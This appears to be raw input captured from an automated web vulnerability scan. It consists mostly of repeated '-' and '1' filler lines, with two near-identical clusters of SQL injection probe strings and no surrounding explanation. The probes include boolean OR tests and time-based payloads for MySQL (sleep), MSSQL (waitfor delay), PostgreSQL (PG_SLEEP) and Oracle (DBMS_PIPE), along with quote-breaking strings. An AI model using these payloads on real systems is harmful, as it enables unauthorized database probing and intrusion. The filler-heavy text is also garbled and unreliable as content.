-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
ONn8SKtG
-
-1 OR 2+636-636-1=0+0+0+1 --
-
-1 OR 2+576-576-1=0+0+0+1
-
-1' OR 2+485-485-1=0+0+0+1 --
-
-1' OR 2+435-435-1=0+0+0+1 or 'iozujNfb'='
-
-1" OR 2+374-374-1=0+0+0+1 --
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
dW0pPQno'; waitfor delay '0:0:15' --
-
1
-
CAB1HAFQ'); waitfor delay '0:0:15' --
-
1
-
kFLeAhil')); waitfor delay '0:0:15' --
-
1
-
-5 OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
-5) OR 506=(SELECT 506 FROM PG_SLEEP(15))--
-
1
-
-1)) OR 564=(SELECT 564 FROM PG_SLEEP(15))--
-
1
-
WQo1VgOS' OR 977=(SELECT 977 FROM PG_SLEEP(15))--
-
1
-
fKaJpw6y') OR 323=(SELECT 323 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
p0v5b7B8')) OR 939=(SELECT 939 FROM PG_SLEEP(15))--
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
BFm2BwBu
-
-1 OR 2+666-666-1=0+0+0+1 --
-
-1 OR 2+361-361-1=0+0+0+1
-
-1' OR 2+893-893-1=0+0+0+1 --
-
-1' OR 2+557-557-1=0+0+0+1 or 'DhVjdcOg'='
-
-1" OR 2+386-386-1=0+0+0+1 --
-
if(now()=sysdate(),sleep(15),0)
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
-1; waitfor delay '0:0:15' --
-
-1); waitfor delay '0:0:15' --
-
-1)); waitfor delay '0:0:15' --
-
1 waitfor delay '0:0:15' --
-
CWi3pBvp'; waitfor delay '0:0:15' --
-
e2NDzGt3'); waitfor delay '0:0:15' --
-
R42K96mV')); waitfor delay '0:0:15' --
-
-5 OR 988=(SELECT 988 FROM PG_SLEEP(15))--
-
-5) OR 831=(SELECT 831 FROM PG_SLEEP(15))--
-
-1)) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-
D47PY4Tf' OR 624=(SELECT 624 FROM PG_SLEEP(15))--
-
Zxf7F52Q') OR 862=(SELECT 862 FROM PG_SLEEP(15))--
-
0tlZl6xO')) OR 248=(SELECT 248 FROM PG_SLEEP(15))--
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
1
-
1